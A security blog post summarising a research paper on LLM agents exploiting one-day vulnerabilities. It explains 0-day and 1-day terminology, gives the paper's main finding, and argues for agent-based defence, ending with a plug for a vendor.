Research Paper Dissection - LLM agents exploit 1day vulns

Photo by 隔壁光头老王 WangMing'Photo

This entire post is based on the research paper by:

Richard Fang, Rohan Bindu, Akul Gupta, Daniel Kang

The paper was referenced in a previous post. The post is one of many experiments describing detection and exploitation automation using GenAI. Part 2 is the latest:

The rise in LLM performance is driving deeper interest in LLM agents and their capabilities. The paper suggests that all prior research in this space focuses on "simple" vulnerabilities. I must admit, my own series of articles - started with a path traversal exploit - so, this is true. However, contrary to the paper suggesting that most work is performed against "toy" targets, I focused on recent (2024) "real-world" CVEs.

What??? Are path traversals are still possible in 2024?../../../../../../../ 4.sheezy!

Thanks to Stealthcopter (https://sec.stealthcopter.com/intigriti-august-2024-ctf/)

In this post we will cover the following:

Most notable - concepts;
Most notable - findings; &
All important - so what?

Key Concepts

n-day (0-day, 1-day) exploits

You may have come across the term "zero day", "Oday" or "0-day" in the past. Simply put, this is a vulnerability with no vendor fix (patch) since the vendor:

Doesn't know about it yet;
Doesn't care about it; or
Is still finding a fix for it.

Traditionally (in the olden days) it referred to the number of days the vendor had to fix an issue before the vulnerability (PoC exploit) was disclosed. The paper describes one-day vulnerabilities as: "vulnerabilities that have been disclosed but not patched in a system". Personally, I find "patch-diffing" analysis and exploitation most interesting:

Granted this is not a binary diff - it's still pretty cool!

LLM agent

An LLM agent is an application of an LLM to reason, plan and execute from problem to solution. Agents typically have access to additional planning, memory and tooling. Augmenting bespoke agents, for example with a RAG pipeline, can produce powerful, autonomous, highly-focused LLM-based solutions. The paper describes such an agent:

Key findings

The results

In summary, it's possible (and I agree with this finding). Some cases may more difficult than others and some models may not be able to solve the problem. However, it's possible with the correct model (e.g. GPT4) targeting specific type of vulnerabilities.

In my next article, I'll describe a process for end-to-end discovery to exploitation.

So what?

Firstly, this implies that patch latency, which is already a problem for most, will now become an exponentially bigger issue. As we shift focus to prioritise and reduce the attack surface, using robust methodologies like CTEM, we must gravitate towards a similar agentic approach for defence. An apt cliché: you need to fight fire with fire.

If you would like more information on AI Defence Tech contact Snode Technologies.